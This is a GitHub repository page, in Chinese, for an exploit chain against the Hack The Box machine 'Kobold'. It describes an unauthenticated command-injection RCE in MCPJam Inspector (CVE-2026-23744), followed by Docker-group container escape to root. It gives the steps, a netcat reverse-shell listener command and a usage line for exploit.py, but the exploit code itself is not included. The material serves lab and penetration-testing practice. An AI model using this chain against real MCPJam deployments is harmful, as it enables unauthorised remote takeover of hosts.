d0x-awrqxavc/CVE-2026-23744-HACKTHEBOX

GitHub: d0x-awrqxavc/CVE-2026-23744-HACKTHEBOX

针对 MCPJam Inspector RCE 漏洞的完整利用链工具,实现从远程代码执行到 Docker 逃逸提权的全自动化攻击。

Stars: 0 | Forks: 0

# CVE-2026-23744 - Kobold Exploit 针对 Kobold HTB 机器的完整链利用。利用 MCPJam Inspector RCE (CVE-2026-23744) 并通过 Docker socket 滥用提权至 root。 ## CVE-2026-23744 MCPJam Inspector <= 1.4.2 默认监听 `0.0.0.0`。`/api/mcp/connect` 端点将 `command` 和 `args` 直接传递给 shell 执行,未进行过滤,从而允许未经身份验证的 RCE。 ## 该漏洞利用的功能 1. 向 `/api/mcp/connect` 发送包含反向 shell payload 的恶意 POST 请求 2. 使用 `sg docker` 切换到 docker 组(gshadow 中无密码) 3. 运行一个挂载主机文件系统的特权容器 4. Chroot 进入主机并发送一个 root 反向 shell ## 使用方法 ``` # 终端 1 - 监听器 nc -lvnp 4444 # 终端 2 - exploit python3 exploit.py mcp.kobold.htb --lhost YOUR_IP --lport 4444 ``` ## 选项 | 标志 | 描述 | 默认值 | |------|-------------|---------| | `target` | 目标主机 | 必填 | | `--lhost` | 你的 IP | 必填 | | `--lport` | 你的端口 | 必填 | | `-p` | 目标端口 | 443 | | `-s` | 协议 (http/https) | https | | `-e` | 端点路径 | /api/mcp/connect | | `-t` | 超时时间 | 10 | | `-v` | 详细输出 | off | ## 环境要求 ``` pip install requests ```
标签:CISA项目, Cutter, CVE-2026-23744, Docker Socket, Exploit-Dev, HTB, Kobold, MCPJam Inspector, OPA, PoC, Python, RCE, Writeup, 协议分析, 命令注入, 容器逃逸, 无后门, 暴力破解, 未授权访问, 权限提升, 编程工具, 网络安全, 请求拦截, 远程代码执行, 逆向Shell, 逆向工具, 隐私保护, 靶场